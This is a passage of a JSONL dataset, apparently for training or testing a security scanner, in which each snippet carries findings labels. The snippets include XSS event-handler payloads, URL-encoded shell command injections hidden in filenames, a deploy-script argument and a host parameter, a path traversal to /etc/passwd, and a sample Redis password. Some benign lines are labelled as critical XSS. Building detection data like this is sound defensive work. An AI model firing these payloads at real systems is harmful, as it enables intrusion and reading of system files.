"fields": {"payload": "<head id=x tabindex=1 onbeforeactivate=alert(1)></head>", "injection_type": "XSS"}}]} {"id": "seclists_03219", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %7C%20%5B%202%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%7C%20%5B%202%20-ne%20%24%28echo%20WIGALP%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522", "injection_type": "cmd"}}]} {"id": "seclists_03220", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:dead@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "dead"}}]} {"id": "seclists_03221", "source": "seclists", "source_license": "MIT", "text": "filename='%7C%7Cecho%20BHFQIY$((13%2B3))$(echo%20BHFQIY)BHFQIY|", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%7C%7Cecho%20BHFQIY$((13%2B3))$(echo%20BHFQIY)BHFQIY|", "injection_type": "cmd"}}]} {"id": "seclists_03222", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\passwd", "injection_type": "cmd"}}]} {"id": "seclists_03223", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><xmp oncontextmenu=\"alert(1)\">test</xmp></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<xmp oncontextmenu=\"alert(1)\">test</xmp>", "injection_type": "XSS"}}]} {"id": "seclists_03224", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Tags: general, evil tags, obfuscated</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_03225", "source": "seclists", "source_license": "MIT", "text": "filename=%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%22%3B%20str%3D%24%28echo%20UYJMIM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//", "injection_type": "cmd"}}]} {"id": "seclists_03226", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><noembed id=x tabindex=1 onbeforeactivate=alert(1)></noembed></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<noembed id=x tabindex=1 onbeforeactivate=alert(1)></noembed>", "injection_type": "XSS"}}]} {"id": "seclists_03227", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Author Name: kishor</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: kishor", "injection_type": "XSS"}}]} {"id": "seclists_03228", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host='%20echo%20IILRDW$((70%2B47))$(echo%20IILRDW)IILRDW HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'%20echo%20IILRDW$((70%2B47))$(echo%20IILRDW)IILRDW", "injection_type": "cmd"}}]}